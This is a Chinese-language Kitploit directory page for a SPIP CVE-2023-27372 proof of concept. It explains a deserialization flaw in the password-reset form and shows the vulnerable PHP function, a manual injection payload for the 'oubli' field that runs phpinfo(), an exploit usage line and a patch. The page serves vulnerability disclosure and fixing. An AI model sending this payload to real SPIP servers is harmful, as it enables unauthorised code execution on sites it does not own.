Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27372-PoC — 这是CVE-2023-27372的一个PoC,它会产生一个完全交互式的shell。 | Kitploit
工具/GitHubGitHub/0spwn/cve-2023-27372-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHub0spwn/cve-2023-27372-poc

CVE-2023-27372-PoC

这是CVE-2023-27372的一个PoC,它会产生一个完全交互式的shell。

查看仓库
63年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

这个PoC是快速编写的,并没有什么特别之处。

它利用了新的CVE-2023-27372 SPIP RCE漏洞。

这是一个反序列化漏洞,利用了密码重置功能(spip.php?page=spip_pass)中危险使用#ENV标签的问题,具体位于"/ecrire/balise/formulaire_.php"文件中,尤其是以下这行:

  1. 用法:python3 exploit.py -u http(s)://url.com
root@kitploit:~
function protege_champ($texte){

	if (is_array($texte))

		$texte = array_map('protege_champ',$texte);

	else {

		// ne pas corrompre une valeur serialize

		if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)

			return $texte;

		$texte = entites_html($texte);

		$texte = str_replace("'","'",$texte);

	}

	return $texte;

}

protege_champ函数存在多个缺陷。用于验证输入的正则表达式(RE)检查存在缺陷,可被轻易绕过。代码在未进行适当验证的情况下调用了unserialize函数,从而允许执行任意代码。手动利用极其简单。例如,如果我们想执行phpinfo();,可以这样做:

root@kitploit:~
oubli=s:19:"<?phpinfo(); ?>";

如果服务器返回了预期的输出,则说明存在漏洞。如何修补?其实相当简单。下面是我写的一个基础补丁:

root@kitploit:~
function protege_champ($texte) {

  if (is_array($texte)) {

    $texte = array_map('protege_champ', $texte);

  } else {

    if (!isValidInput($texte)) {

      $texte = 'Malicious input detected';

    } else {

      $texte = entites_html($texte);

      $texte = str_replace("'", "&#39;", $texte);

    }

  }

  return $texte;

}

修补后的protege_champ函数包含了输入验证、清理以及对恶意输入的处理。

请不要将其用于恶意目的。谢谢。

<a href=https://twitter.com/0SPwn>Twitter

下载工具